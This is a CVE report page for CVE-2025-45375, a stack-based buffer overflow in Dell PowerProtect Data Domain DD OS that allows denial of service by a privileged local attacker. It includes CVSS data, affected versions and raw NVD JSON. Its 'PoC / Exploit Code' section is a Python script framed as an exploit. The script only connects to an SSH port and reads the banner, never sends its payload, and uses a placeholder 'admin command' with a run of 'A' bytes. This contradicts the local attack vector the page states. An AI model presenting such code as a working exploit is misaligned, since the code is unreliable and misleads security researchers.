Security Vulnerability Report
CVE-2025-45375 CVSS 4.4 MEDIUM

Published: 2025-10-07 19:15:38
Last Modified: 2025-10-14 20:08:25

Description

Dell PowerProtect Data Domain with Data Domain Operating System (DD OS) of Feature Release versions 7.7.1.0 through 8.3.0.15, LTS2025 release version 8.3.1.0, LTS2024 release versions 7.13.1.0 through 7.13.1.30, LTS 2023 release versions 7.10.1.0 through 7.10.1.60, contain a Stack-based Buffer Overflow vulnerability. A high privileged attacker with local access could potentially exploit this vulnerability, leading to Denial of service.

CVSS Details

CVSS Score: 4.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:* - VULNERABLE
Dell PowerProtect Data Domain DD OS Feature Release 7.7.1.0 - 8.3.0.15
Dell PowerProtect Data Domain DD OS LTS2025 8.3.1.0
Dell PowerProtect Data Domain DD OS LTS2024 7.13.1.0 - 7.13.1.30
Dell PowerProtect Data Domain DD OS LTS2023 7.10.1.0 - 7.10.1.60

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-45375 - Dell PowerProtect Data Domain Stack-based Buffer Overflow PoC
# Vulnerability: Stack-based Buffer Overflow in DD OS
# Affected: Feature Release 7.7.1.0 - 8.3.0.15, LTS2025 8.3.1.0,
#           LTS2024 7.13.1.0 - 7.13.1.30, LTS2023 7.10.1.0 - 7.10.1.60
# Requirements: Local access + High privilege (admin) account
# Impact: Denial of Service (DoS)

import socket
import struct
import sys

TARGET_HOST = "192.168.1.100"  # Data Domain management IP
TARGET_PORT = 22               # SSH port for DD OS CLI access
BUFFER_SIZE = 4096


# Construct overflow payload
# The vulnerable function in DD OS fails to validate input length
# when processing certain administrative commands
def craft_payload():
    """
    Craft a stack-based buffer overflow payload.
    The payload overflows a stack buffer by providing an excessively
    long argument to a privileged command.
    """
    # Normal command buffer size is typically 256-1024 bytes
    # Overflow by providing input much larger than buffer size
    overflow_size = 8192  # Significantly larger than expected buffer
    junk = b"A" * overflow_size

    # Build the malicious command
    # The specific vulnerable command interface varies by DD OS version
    payload = b"admin command " + junk + b"\n"
    return payload


def exploit():
    """
    Exploit the stack-based buffer overflow vulnerability.
    Requires authenticated local or SSH session with admin privileges.
    """
    print(f"[*] Targeting {TARGET_HOST}:{TARGET_PORT}")
    print("[*] CVE-2025-45375 - DD OS Stack Buffer Overflow")

    payload = craft_payload()
    print(f"[*] Payload size: {len(payload)} bytes")

    try:
        # Connect via SSH (requires valid admin credentials)
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(10)
        sock.connect((TARGET_HOST, TARGET_PORT))

        # Receive SSH banner
        banner = sock.recv(BUFFER_SIZE)
        print(f"[*] SSH Banner: {banner.strip().decode()}")

        # Note: Full exploitation requires authenticated SSH session
        # After authentication, the overflow payload is sent via
        # the privileged CLI interface
        print("[!] Authentication required (admin credentials)")
        print("[!] After auth, send crafted payload via privileged CLI command")
        print("[!] This will trigger stack overflow -> DoS")

        sock.close()
    except Exception as e:
        print(f"[-] Connection failed: {e}")
        sys.exit(1)


if __name__ == "__main__":
    exploit()
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-45375", "sourceIdentifier": "[email protected]", "published": "2025-10-07T19:15:38.400", "lastModified": "2025-10-14T20:08:25.173", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dell PowerProtect Data Domain with Data Domain Operating System (DD OS) of Feature Release versions 7.7.1.0 through 8.3.0.15, LTS2025 release version 8.3.1.0, LTS2024 release versions 7.13.1.0 through 7.13.1.30, LTS 2023 release versions 7.10.1.0 through 7.10.1.60, contain a Stack-based Buffer Overflow vulnerability. A high privileged attacker with local access could potentially exploit this vulnerability, leading to Denial of service."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", "baseScore": 4.4, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.7.1.0", "versionEndExcluding": "7.10.1.70", "matchCriteriaId": "7FCE50EA-F2B8-4455-A489-1947B0CBFEEA"}, {"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.13.1.0", "versionEndExcluding": "7.13.1.40", "matchCriteriaId": "C0EA46C5-6776-411A-8FBC-5B32BC216888"}, {"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.3.0.0", "versionEndIncluding": 
"8.3.0.15", "matchCriteriaId": "F1DB489A-E2CF-4477-A08B-101B569A714E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.3.1.0", "versionEndExcluding": "8.3.1.10", "matchCriteriaId": "9E0743E3-14E7-4FF9-88C5-E038D62F2344"}]}]}], "references": [{"url": "https://www.dell.com/support/kbdoc/en-us/000376224/dsa-2025-333-security-update-for-dell-powerprotect-data-domain-multiple-vulnerabilities", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}